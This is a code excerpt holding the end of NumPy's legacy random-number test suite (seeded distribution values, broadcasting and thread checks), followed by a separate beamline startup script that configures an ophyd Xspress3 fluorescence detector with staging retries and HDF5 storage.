actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random.seed(self.seed)
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random.seed(self.seed)
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random.seed(self.seed)
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random.seed(self.seed)
actual = random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
random.seed(self.seed)
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random.seed(self.seed)
actual = random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn_singleton(self):
random.seed(self.seed)
actual = random.randn()
desired = np.array(1.34016345771863121)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
random.seed(self.seed)
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random.seed(self.seed)
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random.seed(self.seed)
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random.seed(self.seed)
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random.seed(self.seed)
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random.seed(self.seed)
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random.seed(self.seed)
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random.seed(self.seed)
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random.seed(self.seed)
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random.seed(self.seed)
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast:
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def set_seed(self):
random.seed(self.seed)
def test_uniform(self):
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.set_seed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.set_seed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.set_seed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.set_seed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.set_seed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.set_seed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.set_seed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.set_seed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.set_seed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.set_seed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.set_seed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.set_seed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.set_seed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.set_seed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.set_seed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.set_seed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.set_seed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.set_seed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.set_seed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.set_seed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.set_seed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.set_seed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.set_seed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.set_seed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.set_seed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.set_seed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.set_seed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.set_seed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
assert_raises(ValueError, random.lognormal, mean * 3, bad_sigma)
self.set_seed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.set_seed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.set_seed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
self.set_seed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
assert_raises(ValueError, wald, 0.0, 1)
assert_raises(ValueError, wald, 0.5, 0.0)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.set_seed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
self.set_seed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
self.set_seed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = random.binomial
desired = np.array([1, 1, 1])
self.set_seed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.set_seed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = random.negative_binomial
desired = np.array([1, 0, 1])
self.set_seed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.set_seed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = random.RandomState()._poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = random.poisson
desired = np.array([1, 1, 0])
self.set_seed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = random.zipf
desired = np.array([2, 2, 1])
self.set_seed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = random.geometric
desired = np.array([2, 2, 2])
self.set_seed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = random.hypergeometric
desired = np.array([1, 1, 1])
self.set_seed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, 0)
assert_raises(ValueError, hypergeom, 10, 10, 25)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = random.logseries
desired = np.array([1, 1, 1])
self.set_seed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread:
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
# Ensure returned array dtype is correct for platform
def test_integer_dtype(int_func):
random.seed(123456789)
fname, args, sha256 = int_func
f = getattr(random, fname)
actual = f(*args, size=2)
assert_(actual.dtype == np.dtype('l'))
def test_integer_repeat(int_func):
random.seed(123456789)
fname, args, sha256 = int_func
f = getattr(random, fname)
val = f(*args, size=1000000)
if sys.byteorder != 'little':
val = val.byteswap()
res = hashlib.sha256(val.view(np.int8)).hexdigest()
assert_(res == sha256)
def test_broadcast_size_error():
# GH-16833
with pytest.raises(ValueError):
random.binomial(1, [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], 0.3, size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], [0.3, 0.7], size=(2, 1))
|
21-xspress3.py
|
from ophyd.device import (Component as Cpt)
from hxntools.detectors.xspress3 import (Xspress3FileStore,
Xspress3Channel)
from hxntools.detectors.hxn_xspress3 import HxnXspress3DetectorBase
import threading
from ophyd import DeviceStatus
class HxnXspress3Detector(HxnXspress3DetectorBase):
channel1 = Cpt(Xspress3Channel, 'C1_', channel_num=1)
channel2 = Cpt(Xspress3Channel, 'C2_', channel_num=2)
channel3 = Cpt(Xspress3Channel, 'C3_', channel_num=3)
# Currently only using three channels. Uncomment these to enable more
# channels:
# channel4 = C(Xspress3Channel, 'C4_', channel_num=4)
# channel5 = C(Xspress3Channel, 'C5_', channel_num=5)
# channel6 = C(Xspress3Channel, 'C6_', channel_num=6)
# channel7 = C(Xspress3Channel, 'C7_', channel_num=7)
# channel8 = C(Xspress3Channel, 'C8_', channel_num=8)
hdf5 = Cpt(Xspress3FileStore, 'HDF5:',
write_path_template='/data/%Y/%m/%d/',
mds_key_format='xspress3_ch{chan}',
reg=db.reg,
root='/data',
)
def __init__(self, prefix, *, configuration_attrs=None, read_attrs=None,
**kwargs):
if configuration_attrs is None:
configuration_attrs = ['external_trig', 'total_points',
'spectra_per_point']
if read_attrs is None:
read_attrs = ['channel1', 'channel2', 'channel3', 'hdf5']
super().__init__(prefix, configuration_attrs=configuration_attrs,
read_attrs=read_attrs, **kwargs)
self._dispatch_cid = None
self._spec_saved = threading.Event()
def stage(self, *args, **kwargs):
for j in itertools.count():
try:
ret = super().stage(*args, **kwargs)
except TimeoutError:
N_try = 20
if j < 20:
print(f"failed to stage on try{j}/{N_try}, may try again")
continue
else:
raise
else:
break
# clear any existing callback
if self._dispatch_cid is not None:
self.hdf5.num_captured.unsubscribe(self._dispatch_cid)
self._dispatch_cid = None
# always install the callback
def _handle_spectrum_capture(old_value, value, timestamp, **kwargs):
# if we get called and we are in fly mode, rip self off and bail
# the flyscan takes care of this its self, but does not tell us we are in fly
# mode until after we are staged
if self.mode_settings.scan_type.get() != 'step':
if self._dispatch_cid is not None:
self.hdf5.num_captured.unsubscribe(self._dispatch_cid)
self._dispatch_cid = None
return
# grab the time and the previous value from the callback payload
trigger_time = timestamp
self._abs_trigger_count = old_value
# dispatch for all of the channels
for sn in self.read_attrs:
if sn.startswith('channel') and '.' not in sn:
ch = getattr(self, sn)
self.dispatch(ch.name, trigger_time)
self._abs_trigger_count = value
self._spec_saved.set()
# do the actual subscribe
self._dispatch_cid = self.hdf5.num_captured.subscribe(
_handle_spectrum_capture,
run=False)
return ret
def trigger(self):
self.sts = sts = DeviceStatus(self)
# in the not step case, just return a done status object
if self.mode_settings.scan_type.get() != 'step':
sts._finished()
return sts
s = self.trigger_internal() # IS IT CORRECT WAY TO TRIGGER ACQUISITION?
self._spec_saved.clear()
def monitor():
success = self._spec_saved.wait(60)
sts._finished(success=success)
# hold a ref for gc reasons
self._th = threading.Thread(target=monitor)
self._th.start()
return sts
def unstage(self, *args, **kwargs):
try:
if self._dispatch_cid is not None:
self.hdf5.num_captured.unsubscribe(self._dispatch_cid)
self._dispatch_cid = None
finally:
import itertools
for j in itertools.count():
try:
ret = super().unstage(*args, **kwargs)
except TimeoutError:
N_try = 20
if j < N_try:
print(f"failed to unstage on attempt {j}/{N_try}, may try again")
continue
else:
raise
else:
break
return ret
xspress3 = HxnXspress3Detector('XF:03IDC-ES{Xsp:1}:', name='xspress3')
# Create directories on the xspress3 server, otherwise scans can fail:
xspress3.make_directories.put(True)
